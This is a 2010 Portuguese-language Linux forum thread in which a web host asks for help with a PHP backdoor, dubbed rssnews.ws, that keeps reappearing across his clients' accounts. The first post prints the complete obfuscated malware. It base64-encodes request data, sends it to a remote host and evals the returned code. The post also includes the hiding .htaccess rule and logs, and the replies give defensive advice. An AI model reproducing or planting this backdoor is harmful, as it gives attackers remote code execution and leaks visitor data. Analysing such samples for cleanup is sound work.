Vírus / Backdoor - rssnews.ws

1. Vírus / Backdoor - rssnews.ws

Raphael Garcez
raphaelfx

(usa Outra)

Enviado em 09/07/2010 - 23:43h

Olá pessoal,

Ultimamente percebi que todos meus clientes do servidor estava com arquivos php suspeitos em suas hospedagem.
Todos meus clientes estão com arquivos numéricos php (exemplo: 45310.php), dei uma analisada nos logs e vi a seguinte mensagem:

ALERT - Include filename ('http://ads.rssnews.ws/?cmFwaGFlbGdhcmNlei5jb20=.cmFwaGFlbGdhcmNlei5jb20=.L21hcml6YS93cC1jb250ZW50L3VwbG9hZHMvYnVjZXRhcy12b3lldXItZm90b3MtbWVuaW5hcy5odG1s.L21hcml6YS93cC1jb250ZW50L3VwbG9hZHMvMTIxMDQzLnBocA==...TW96aWxsYS81LjAgKGNvbXBhdGlibGU7IFlhaG9vISBTbHVycC8zLjA7IGh0dHA6Ly9oZWxwLnlhaG9vLmNvbS9oZWxwL3VzL3lzZWFyY2gvc2x1cnAp.NjcuMTk1LjExMC4xNzI=.e.L2hvbWUvcmFwaGFlbGcvcHVibGljX2h0bWwvbWFyaXphL3dwLWNvbnRlbnQvdXBsb2Fkcy8xMjEwNDMucGhw.ZW4tdXMsZW47cT0wLjU=') is an URL that is not allowed (attacker '67.195.110.172', file '/home/raphaelg/public_html/mariza/wp-content/uploads/121043.php', line 1)

Aparecem milhares de erros como este, porém um em cada pasta de meus clientes.
Não entendi muito bem este "attacker" já que em algumas vezes aparece meu próprio ip como attacker.

Buscando no google dizem ser comum este "virus" que eles mesmo chamam de rssnews.ws, porém que ninguém acha uma solução.

Ele cria arquivos por todo servidor com nomes aleatórios o que dificulta a remoção dos mesmos, também percebi que ele cria junto um .htaccess.

Já passei chkrootkit e rkhunter também e não detectou nada.

Agora segue o contéudo dos arquivos que ele cria:

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="a8e5a8ba27216d9652ea2903c861325d") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$[*****]=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($[*****],CURLOPT_RETURNTRANSFER,1);$o=curl_exec($[*****]);curl_close($[*****]);eval($o);};die(); ?>

Segue abaixo o contéudo do .htaccess que acompanha todos os phps:

Options -MultiViews
ErrorDocument 404 //mariza/wp-content/uploads/121043.php


Pelo que entendi o .htaccess tenta mascarar este arquivo.
Não sei por onde ele entrou, no google diz que ele usa uma falha de wordpress, o problema que ele esta por todo servidor em todos clientes, inclusive com os que não possui wordpress.
O vírus parece antigo a primeira versão dele é de 2 anos atrás e ele continua rodeando a rede.

Estou perdido, por enquanto isto não causou nada de grave no servidor. Tenho monitorado 24horas e até agora não sofri nenhuma invasão.

Se alguém souber como este problema pode ser resolvido, ficarei muito agradecido. Inclusive estou dando uma pequena remuneração como incentivo para o pessoal.

Sei um pouco de linux mas dessa vez eu travei mesmo, a 2 dias rodei um "find" para tentar localizar todos arquivos, consegui localizar todos e apaguei os mesmo, porém em 4 dias já estava espalhado por todo servidor novamente.

Atenciosamente,

Raphael Garcez
Voa Host


  


2. Re: Vírus / Backdoor - rssnews.ws

Perfil removido
removido

(usa Nenhuma)

Enviado em 10/07/2010 - 13:44h

UP!


3. Re: Vírus / Backdoor - rssnews.ws

Joao
stack_of

(usa Slackware)

Enviado em 10/07/2010 - 14:39h

Isso deve rer um script malicioso que redireciona conteudo do seu site para

71.rssnews.ws

Pelo menos e o que da o base64decode das strings de url acima.


4. Re: Vírus / Backdoor - rssnews.ws

anna kamilla
annakamilla

(usa Manjaro Linux)

Enviado em 10/07/2010 - 14:47h

interessante.

dá um ps -aux e me mostre os processos que rodam nesse servidor.

outra coisinha:

le o ultimo tutorial do gdh sobre segurança http://www.guiadohardware.net/artigos/taticas-seguranca-linux/
achei ele ótimo


5. Re: Vírus / Backdoor - rssnews.ws

Raphael Garcez
raphaelfx

(usa Outra)

Enviado em 11/07/2010 - 03:00h

Exato stack_of.

Na string ele tenta redirecionar, mas ele não ta conseguindo por que bloquiei o IP do site deles (acho que é por isso) ou é meu servidor mesmo que não está aceitando.
Ele se utiliza do arquivo criado para tentar infiltrar o código da string.

O problema é, como ele ta criando os arquivos .php?

Segue abaixo o ps -aux:

Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 10348 700 ? Ss Jul09 0:03 init [3]
root 2 0.0 0.0 0 0 ? S< Jul09 0:00 [migration/0]
root 3 0.0 0.0 0 0 ? SN Jul09 0:00 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? S< Jul09 0:00 [watchdog/0]
root 5 0.0 0.0 0 0 ? S< Jul09 0:00 [migration/1]
root 6 0.0 0.0 0 0 ? SN Jul09 0:00 [ksoftirqd/1]
root 7 0.0 0.0 0 0 ? S< Jul09 0:00 [watchdog/1]
root 8 0.0 0.0 0 0 ? S< Jul09 0:00 [events/0]
root 9 0.0 0.0 0 0 ? S< Jul09 0:00 [events/1]
root 10 0.0 0.0 0 0 ? S< Jul09 0:00 [khelper]
root 27 0.0 0.0 0 0 ? S< Jul09 0:00 [kthread]
root 32 0.0 0.0 0 0 ? S< Jul09 0:01 [kblockd/0]
root 33 0.0 0.0 0 0 ? S< Jul09 0:00 [kblockd/1]
root 34 0.0 0.0 0 0 ? S< Jul09 0:00 [kacpid]
root 128 0.0 0.0 0 0 ? S< Jul09 0:00 [cqueue/0]
root 129 0.0 0.0 0 0 ? S< Jul09 0:00 [cqueue/1]
root 132 0.0 0.0 0 0 ? S< Jul09 0:00 [khubd]
root 134 0.0 0.0 0 0 ? S< Jul09 0:00 [kseriod]
root 206 0.0 0.0 0 0 ? S Jul09 0:00 [khungtaskd]
root 209 0.0 0.0 0 0 ? S< Jul09 1:07 [kswapd0]
root 210 0.0 0.0 0 0 ? S< Jul09 0:00 [aio/0]
root 211 0.0 0.0 0 0 ? S< Jul09 0:00 [aio/1]
root 357 0.0 0.0 0 0 ? S< Jul09 0:00 [kpsmoused]
root 388 0.0 0.0 0 0 ? S< Jul09 0:00 [ata/0]
root 389 0.0 0.0 0 0 ? S< Jul09 0:00 [ata/1]
root 390 0.0 0.0 0 0 ? S< Jul09 0:00 [ata_aux]
root 394 0.0 0.0 0 0 ? S< Jul09 0:00 [scsi_eh_0]
root 395 0.0 0.0 0 0 ? S< Jul09 0:00 [scsi_eh_1]
root 402 0.0 0.0 0 0 ? S< Jul09 0:00 [kstriped]
root 415 0.0 0.0 0 0 ? S< Jul09 0:00 [ksnapd]
root 430 0.0 0.0 0 0 ? S< Jul09 1:41 [kjournald]
root 455 0.0 0.0 0 0 ? S< Jul09 0:00 [kauditd]
root 488 0.0 0.0 12672 792 ? S<s Jul09 0:00 /sbin/udevd -d
root 1298 0.0 0.0 0 0 ? S< Jul09 0:00 [kmpathd/0]
root 1299 0.0 0.0 0 0 ? S< Jul09 0:00 [kmpathd/1]
root 1300 0.0 0.0 0 0 ? S< Jul09 0:00 [kmpath_handle]
root 1323 0.0 0.0 0 0 ? S< Jul09 0:00 [kjournald]
root 1568 0.0 0.0 0 0 ? S< Jul09 0:02 [loop0]
root 1569 0.0 0.0 0 0 ? S< Jul09 0:00 [kjournald]
root 1616 0.0 0.0 0 0 ? S< Jul09 0:08 [kondemand/0]
root 1617 0.0 0.0 0 0 ? S< Jul09 0:08 [kondemand/1]
root 1839 0.0 0.0 92884 944 ? S<sl Jul09 0:03 auditd
root 1841 0.0 0.0 81808 992 ? S<sl Jul09 0:00 /sbin/audispd
root 1928 0.0 0.0 5908 608 ? Ss Jul09 0:01 syslogd -m 0
root 1931 0.0 0.0 3804 428 ? Ss Jul09 0:00 klogd -x
dbus 2027 0.0 0.0 21256 908 ? Ss Jul09 0:00 dbus-daemon --s
root 2063 0.0 0.0 3800 576 ? Ss Jul09 0:00 /usr/sbin/acpid
68 2076 0.0 0.1 30780 3836 ? Ss Jul09 0:00 hald
root 2077 0.0 0.0 21692 1048 ? S Jul09 0:00 hald-runner
68 2084 0.0 0.0 12324 844 ? S Jul09 0:00 hald-addon-acpi
root 2122 0.0 0.0 57688 1760 ? Ssl Jul09 0:00 automount
root 2148 0.0 0.0 62624 1216 ? Ss Jul09 0:00 /usr/sbin/sshd
root 2165 0.0 0.0 65940 1284 ? S Jul09 0:00 /bin/sh /usr/bi
mysql 2262 0.4 20.5 860876 416140 ? Sl Jul09 12:04 /usr/sbin/mysql
root 2408 0.1 0.0 0 0 ? S 02:49 0:01 [pdflush]
root 2473 0.0 0.0 93356 1300 ? Ss Jul09 0:00 pure-ftpd (SERV
root 2477 0.0 0.0 91004 960 ? S Jul09 0:00 /usr/sbin/pure-
root 2490 0.0 0.0 74824 1192 ? Ss Jul09 0:00 crond
root 2689 0.0 0.3 35348 6092 ? S Jul09 0:05 queueprocd - wa
root 2699 0.0 0.4 45984 9192 ? S Jul09 0:05 tailwatchd
root 2702 0.0 0.1 26136 2228 ? SN Jul09 0:00 cpanellogd - sl
root 3016 0.0 0.4 99352 8656 ? Ss Jul09 0:00 /usr/sbin/munin
root 3141 0.0 1.8 118716 37932 ? S Jul09 0:00 cPGSD/0.7.3
root 3325 0.0 0.0 18416 580 ? S Jul09 0:00 /usr/sbin/smart
root 3328 0.0 0.0 3792 484 tty1 Ss+ Jul09 0:00 /sbin/mingetty
root 3329 0.0 0.0 3792 484 tty2 Ss+ Jul09 0:00 /sbin/mingetty
root 3332 0.0 0.0 3792 484 tty3 Ss+ Jul09 0:00 /sbin/mingetty
root 3337 0.0 0.0 3792 480 tty4 Ss+ Jul09 0:00 /sbin/mingetty
root 3339 0.0 0.0 3792 484 tty5 Ss+ Jul09 0:00 /sbin/mingetty
root 3345 0.0 0.0 3792 484 tty6 Ss+ Jul09 0:00 /sbin/mingetty
root 3552 0.0 0.0 0 0 ? S 02:51 0:00 [pdflush]
root 3640 0.0 0.0 11560 688 ? Ss Jul09 0:00 /usr/local/cpan
root 3643 0.0 0.0 11560 692 ? Ss Jul09 0:00 /usr/local/cpan
root 3650 0.0 0.0 11560 688 ? Ss Jul09 0:00 /usr/local/cpan
root 3654 0.0 0.0 11604 852 ? Ss Jul09 0:05 /usr/local/cpan
root 4894 0.0 0.4 51404 9604 ? S 02:55 0:00 tailwatchd
root 4903 0.0 0.2 34184 5176 ? S 02:55 0:00 /scripts/restar
root 4904 0.0 0.0 11120 744 ? S 02:55 0:00 /usr/bin/spamc
munin 6993 0.0 0.0 104088 1588 ? S 03:00 0:00 crond
munin 7002 0.0 0.0 8700 952 ? Ss 03:00 0:00 /bin/sh /usr/bi
munin 7003 0.0 0.4 88556 8436 ? S 03:00 0:00 /usr/local/bin/
munin 7012 0.0 0.3 90648 7380 ? S 03:00 0:00 /usr/share/muni
root 7429 0.0 0.0 3792 220 ? S 03:00 0:00 /usr/sbin/couri
root 7430 0.0 0.0 7988 540 ? S 03:00 0:00 /usr/lib/courie
root 7436 0.0 0.0 3792 220 ? S 03:00 0:00 /usr/sbin/couri
root 7437 0.0 0.0 7988 544 ? S 03:00 0:00 /usr/lib/courie
root 7442 0.0 0.0 3792 324 ? S 03:00 0:00 /usr/sbin/couri
root 7443 0.0 0.0 7988 556 ? S 03:00 0:00 /usr/lib/courie
root 7454 0.0 0.0 3792 216 ? S 03:00 0:00 /usr/sbin/couri
root 7455 0.0 0.0 7988 540 ? S 03:00 0:00 /usr/lib/courie
root 7462 0.0 0.0 3792 324 ? S 03:00 0:00 /usr/sbin/couri
root 7463 0.0 0.0 14396 684 ? S 03:00 0:00 /usr/libexec/co
root 7464 0.0 0.0 14396 180 ? S 03:00 0:00 /usr/libexec/co
root 7465 0.0 0.0 14396 180 ? S 03:00 0:00 /usr/libexec/co
root 7466 0.0 0.0 14396 180 ? S 03:00 0:00 /usr/libexec/co
root 7467 0.0 0.0 14396 180 ? S 03:00 0:00 /usr/libexec/co
root 7468 0.0 0.0 14396 392 ? S 03:00 0:00 /usr/libexec/co
root 7647 0.0 0.4 51404 9600 ? S 03:00 0:00 tailwatchd
root 7652 0.0 0.2 34184 5180 ? S 03:00 0:00 /scripts/restar
root 7653 0.3 1.0 165304 21128 ? Ss 03:00 0:00 /usr/local/apac
root 7654 0.0 0.0 11120 680 ? S 03:00 0:00 /usr/bin/spamc
root 7662 0.0 0.3 44408 7680 ? S 03:00 0:00 /usr/local/cpan
root 7669 0.0 0.6 149248 12692 ? S 03:00 0:00 /usr/local/apac
nobody 7673 0.0 0.7 165304 16088 ? S 03:00 0:00 /usr/local/apac
nobody 7674 0.0 0.7 165304 16080 ? S 03:00 0:00 /usr/local/apac
nobody 7675 0.0 0.7 165304 16080 ? S 03:00 0:00 /usr/local/apac
nobody 7676 0.0 0.7 165304 16080 ? S 03:00 0:00 /usr/local/apac
nobody 7677 0.0 0.7 165304 16080 ? S 03:00 0:00 /usr/local/apac
root 7808 0.0 0.2 28852 4152 ? S 03:01 0:00 /etc/authlib/au
mailnull 8224 0.0 0.0 64328 1116 ? Ss 03:01 0:00 /usr/sbin/exim
root 8233 0.0 0.1 64324 2024 ? S 03:01 0:00 /usr/sbin/exim
root 8235 0.0 0.1 65660 3556 ? S 03:01 0:00 /usr/sbin/exim
root 8247 1.9 2.2 113064 44532 ? Ss 03:01 0:00 /usr/bin/spamd
mailnull 8257 0.0 0.1 66540 2032 ? S 03:01 0:00 /usr/sbin/exim
root 8305 0.0 0.2 65668 4420 ? Ss 03:01 0:00 /usr/sbin/exim
root 8443 0.1 0.1 92168 3272 ? Ss 03:01 0:00 sshd: root@pts/
root 8466 0.0 0.6 86832 12948 ? S 03:01 0:00 cpsrvd - waitin
root 8467 0.2 0.0 0 0 ? Zs 03:01 0:00 [bui] <defunct>
root 8496 0.0 2.1 113064 43208 ? S 03:01 0:00 spamd child
root 8498 0.0 2.1 113064 43192 ? S 03:01 0:00 spamd child
root 8504 0.0 0.0 66204 1588 pts/0 Ss 03:01 0:00 -bash
root 8529 0.0 0.4 52324 9428 ? Ss 03:01 0:00 cpsrvd: interna
root 8567 0.0 0.0 3780 452 ? SN 03:01 0:00 /usr/local/cpan
root 8568 0.0 0.0 3780 176 ? TNs 03:01 0:00 /usr/local/cpan
root 8598 0.0 0.0 65604 976 pts/0 R+ 03:02 0:00 ps -aux
root 20474 0.0 0.2 36232 4648 ? SNs 01:00 0:00 /scripts/cpback
named 31079 0.0 0.4 168588 8580 ? Ssl Jul10 0:03 /usr/sbin/named

Alguém saberia dizer o que significa o attacker que aparece nos messages? Lá no meu tópico inicial onde eu citei a URL tem o "attacker" e cada hora aparece um IP ali.

Obrigado a todos !!!


6. Re: Vírus / Backdoor - rssnews.ws

Luiz Vieira
luizvieira

(usa Debian)

Enviado em 11/07/2010 - 16:28h

Raphael, a grande questão de os arquivos estarem mesmo em locais onde não há wordpress é relativa, pois se vc tiver um site com wordpress instalado e compartilhando o mesmo servidor com outros domínios, esse demais domínios tbm serão comprometidos. Isso é um problema que enfrentamos quando trabalhamos com servidores compartilhados. Por isso sempre aconselho à clientes meus, que caso possuam uma aplicação web crítica, que aluguem um servidor dedicado...

Isole os domínios que utilizam wordpress, limpe os arquivos nos demais locais, e faça um teste, verificando se a infecção continua ocorrendo onde não há o wordpress instalado.

Você pode utilizar o chroot, com o debootstrap para gerar uma espécie de sandbox pra isolar os domínios que podem estar com problemas.

Quando puder, dê uma ouvida no áudio de um evento que participei:
http://www.4linux.com.br/eventos/2010/boteconet-analise-vulnerabilidades-aplicacoes-web.html

Falamos um pouco sobre vulnerabilidades web. Vai rolar um outro evento sobreo mesmo tema em breve.

[ ]'s
Luiz






Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts